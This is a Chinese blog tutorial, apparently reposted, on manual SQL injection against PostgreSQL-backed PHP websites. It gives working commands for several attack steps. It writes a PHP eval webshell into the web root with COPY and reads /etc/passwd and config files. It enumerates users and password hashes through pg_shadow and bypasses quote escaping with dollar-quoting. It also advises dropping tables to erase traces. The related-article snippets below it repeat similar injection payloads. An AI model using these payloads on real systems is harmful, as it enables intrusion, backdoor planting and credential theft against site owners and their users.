SQL手工注入基础详解---- postgresql篇

最新推荐文章于 2023-02-03 10:45:38 发布
最新推荐文章于 2023-02-03 10:45:38 发布
阅读量1.1w 收藏 2
点赞数 3
分类专栏: 数据库安全 数据库 文章标签: postgresql sql 数据库 file mysql table

来源:邪恶八进制信息安全团队

文章作者:x2bug
一般注入多用于在mssql和mysql两类数据库中,如mssql+asp、mysql+php则是最为常见的搭配环境。不同的网站应用的数据库也大不一样,根据数据库的处理能力、负载等多重因素决定。诸如mssql与mysql各类注入问题在网上已是随处可见,本文主要述说下关于少见的一类数据库注入:PostgreSQL。
关于PostgreSQL
PostgreSQL是一种特性非常齐全的自由软件的对象-关系型数据库管理系统(ORDBMS),可以说是目前世界上最先进,功能最强大的自由数据库管理系统。
了解PostgreSQL
1.同其他数据库一致,SQL语句基本一致
2.支持/*、/**/、–注释,;和\g表示语句结束
3.使用||可以连接字符串(类似于mssql中的+),同时需要注意特殊字符被转义
4.无法自动匹配字段
5.web管理程序为phpPgAdmin
6.开放的默认端口为5432
注入PostgreSQL
1.内置函数
通过一些内置函数我们可以获取到很多关于数据库的信息,简单列举下比较有价值的函数:
current_database() //当前数据库名
session_user   //会话用户
current_user   //当前数据库用户
2.如何读取表与字段、内容
一般我们都先回手工猜测数据库中的表和字段,但如果猜测不到也没有关系,这并不是access数据库,可以通过一些数据库本身存在的表与字段读取所有表和字段,如mysql中会表所有表和字段放入一个预定的库中。在PostgreSQL在让我们读取这些信息也提供了方便,数据库可以通过pg_stat_user_tables来依次读取,另外information_schema.columns也给我们一样提供了方便,让我们可以读取数据库表和字段,其次还有pg_user、pg_group、pg_shadow都能返回给我们很多有用的信息,记得oid也能让我们获取到这些信息,不过记不太清楚了,如此多的途径相信在获取表或字段这些你都不会有问题了。读取内容的时候我们也同样可以根据ID来依次数据。我曾经遇见过一个PostgreSQL+php网站,由于magic_quotes_gpc=on的问题,又找不到id类的标识可以让我去读取表中其他内容,这个时候除此之外通过limit n offse n读取到了表中所有内容,其实它真的很不错。
3.读、写文件
通过数据库写文件来获取webshell是最为直接的方式了,不需要找后台,也不需要找上传漏洞,甚至我们可以通过数据库来直接获取到服务器的hash值进行破解,简直给我们带来了太多的方便。如何写文件呢?
create table file(shell text not null);   //创建表和字段
insert into file values(‘<?php eval($_POST[cmd]);?>’);   //写入代码到数据库
copy file(shell) to ‘/var/www/html/shell.php’;   //导出文件
通过上面三个语句我们就可以轻松的获取到一句话,执行这些我想不是一问题,通过;或构造其他语句都可以实现,最后记得删除执行drop table file来删除痕迹。一篇文中曾提到过更简单的方法
copy (select ‘<?php eval($_POST[cmd]);?>’) to ‘/var/www/html/shell.php’
一句话就直接搞定,不过未曾测试这句话的可行性。在没有写入文件权限的时候可以尝试下读取文件,看看如何构造读取文件的语句吧?
create table file(file text not null);   //创建表和字段
copy file (file) from ‘/etc/passwd’;   //复制文件内容到字段中
select * from file; //查询
也可以通过这个来读取网站配置文件来获取数据库呢,真的很方便。另外PostgreSQL新版本中也提供了很多的函数,如:pg_read_file(‘/etc/passwd’,1,20)可以直接读取文件内容,类似于此函数还有:pg_file_write(filename,text,bool)、pg_read_file(filename,pos,length)、pg_ls_dir(dirname)等,不过这些函数常被管理员因为安全考虑而删除,这就看运气了。
4.如何绕过”\”转义(引号)
如果PHP中开启了magic_quotes_gpc=on,那么很悲剧的是一些符号将会被转义,如执行select pass from member where name=”admin”,最后的语句执行时为:select pass from member where name=\”admin\”,这样就无法达到我们想要的结构了。其他数据库我们尝是通过hex、char编码来解决这个问题,而在PostgreSQL中除此也给我们提供了一种新的方法来绕过。在语句中,允许我们通过$和$之间来绕过引号的转义或者过滤问题,可以改写成这样:select pass from member where name=$admin$,如此就成功的绕过了引号问题。
至此,你应该对PostgreSQL的注入了解不少了,操作上应该不是问题了。其次我想说的是在这个数据库类型中注入方法不仅仅于此,以后再说说吧!真的很强大。

xabc3000
关注
  • 3
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
pg-bump:PostgreSQL极简SQL迁移CLI
05-05
pg-bump 一个自以为是的,极简的PostgreSQL SQL迁移CLI。它是什么? pg-bump提供对“ Plain SQL”中编写的PostgreSQL数据库模式迁移的命令行管理。 假定a)您正在以及b)您正在。 pg-bump主要用于的可执行文件。 ...
详解如何在postgresql注入
瞎几把学
05-17 1016
<br />一般注入多用于在mssqlmysql两类数据库中,如mssql+asp、mysql+php则是最为常见的搭配环境。不同的网站应用的数据库也大不一样,根据数据库的处理能力、负载等多重因素决定。诸如mssqlmysql各类注入问题在网上已是随处可见,本文主要述说下关于少见的一类数据库注入PostgreSQL。<br />关于PostgreSQL<br />PostgreSQL是一种特性非常齐全的自由软件的对象-关系型数据库管理系统(ORDBMS),可以说是目前世界上最先进,功能最强大的自由数据
pgsql数据库实现导入导出(附sql示例)
热门推荐
qq_44760975的博客
06-01 1万+
pgsql数据库使用命令行导入导出(附sql示例)
Mybatis-Plus+JPA+postgresql存储复杂类型、TypeHandle使用
梅子黄时雨
02-03 991
Mybatis-Plus+JPA+postgresql存储复杂类型、TypeHandle使用
PostgreSQL手工注入实战-mozhe
m0_63917373的博客
10-02 366
墨者 PostgreSQL手工注入实战
PostgreSQL数据库注入-墨者学院(SQL手工注入漏洞测试(PostgreSQL数据库))
T1ngSh0w的博客
09-06 1420
PostgreSQL数据库注入-墨者学院-SQL手工注入漏洞测试(PostgreSQL数据库)
postgresql-monitoring:监视postgresql的查询
02-05
postgresql-monitoring:监视postgresql的查询
postgresql-9.4.1212
09-22
postgresql-9.4.1212驱动, driver=org.postgresql.Driver url=jdbc:postgresql://127.0.0.1:5432/test 配置驱动 url 账户密码等, 创建connector即可连接使用, 亲测可用
postgresql-parser:PostgreSQL解析器
03-04
PostgreSQL样式解析器从拆分而来 请参阅: 我试图导入github.com/cockroachdb/cockroach/pkg/sql/parser ,但是依赖项太复杂而无法正常工作。 为了使事情变得容易,我做了以下事情: 复制所有pkg/sql/parser , ...
PostgreSQLpostgresql-13.5.tar.bz2)
11-20
PostgreSQLpostgresql-13.5.tar.bz2) PostgreSQL是一种特性非常齐全的自由软件的对象-关系型数据库管理系统(ORDBMS),是以加州大学计算机系开发的POSTGRES,4.2版本为基础的对象关系型数据库管理系统。...
SQL注入漏洞(postgresql注入
errorr0
07-08 6795
postgresql sql注入
PostgreSQL】MyBatis中自定义typeHandler映射PostgreSQL中json类型字段
Mr_EvanChen的Blog
08-27 5385
  数据库PostgreSQL,表sub_rule的detail字段类型为json 实体类中detail字段类型为Object public class SubRule { private String id; private String name; private Object detail; //json类型 private...
使用mybatis中的自定义TypeHandler处理PostgreSQL中的Json类型
学习
07-06 7573
postgres里的json格式 我们在使用postgres数据库时会使用到json格式来存放一些格式不固定的字段,postgres支持json和jsonb两种格式,两者的区别以后再说,今天说一下结合mybaits的使用方法: 1. typeHandler的实现 mybatis默认是没有实现json类型字段对应的TypeHandler,所以一般我们需要自定义mybatis的TypeHand...
Oracle,MongoDB、access、msSQLpostgresql注入
leekos的博客,分享web安全相关知识~
12-06 412
Oracle,MongoDB、access、msSQLpostgresql注入sqlmap使用
分析黑客入侵 PostgreSQL 数据库
一叶的专栏
07-06 2139
问题分析 前几天,由于开发需要,我在 AWS EC2 部署了一个 PostgreSQL 数据库服务,本来想着过几天用完就终止服务,因此放松了警惕,数据库服务的所有配置保持默认配置,包括账号密码以及端口。然而,今天连接数据库时,出现了如下异常: FATAL: pg_hba.conf rejects connection for host "xx.xx.xx.xx", user "postgres",...
postgresql 数据库 入侵分析
whatday的专栏
01-06 340
前几天,由于开发需要,我在 AWS EC2 部署了一个PostgreSQL数据库服务,本来想着过几天用完就终止服务,因此放松了警惕,数据库服务的所有配置保持默认配置,包括账号密码以及端口。异常信息大概意思是,数据库服务拒绝连接请求。于是,我尝试登陆EC2服务后,通过本地连接到数据库,依然提示类似的错误信息。此时,我已经可以十分肯定,数据库被黑了……异常信息中提示到 pg_hba.conf 文件,因此,沿着这个线索去找到问题所在。
PostgreSQL 注入整理
瞎几把学
05-17 4601
PostgreSQL 注入整理 <br />5432端口<br />/*order by猜字段数*/<br />http://www.bug.cx/detail.php?id=236+order+by+26--<br />/*判断postgresql数据库*/<br />http://www.bug.cx/detail.php?id=236+and+1::int=1--<br />/*通过cast类型转换来暴postgresql信息*/<br />http://www.bug.cx/detail.php?i
postgresql的简单手工注入
qq_42042353的博客
10-09 643
日常判断注入点 ’ and 1=1 and 1=2 通过一些函数来获取数据库的基本信息 and 1=cast(version() as int) 获取数据库版本信息 系统信息 and 1=cast(user||123 as int) 获取当前用户名称 创建表 ;create table xxx(w text not null); 向表中插入一句话木马 ;insert into xxx valu...
PostgreSQL注入总结(待完成)
qq_39764475的博客
04-06 6453
简介 PostgreSQL 是一个免费的对象-关系数据库服务器(ORDBMS),在灵活的BSD许可证下发行。 PostgreSQL 开发者把它念作 post-gress-Q-L。 PostgreSQL 的 Slogan 是 “世界上最先进的开源关系型数据库”。 参考内容:PostgreSQL 10.1 手册 基本使用 1.createdb 命令创建数据库 createdb 是一个 SQL 命令 CREATE DATABASE 的封装。 createdb 命令语法格式如下: createdb [option.
postgresql-10.15
最新发布
09-13
postgresql-10.15是PostgreSQL数据库的一个版本。根据引用中的安装方法,您可以使用以下步骤来安装和配置PostgreSQL 10.15: 1. 首先,使用以下命令安装pgdg-redhat软件库的最新版本: ``` sudo yum install -y ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值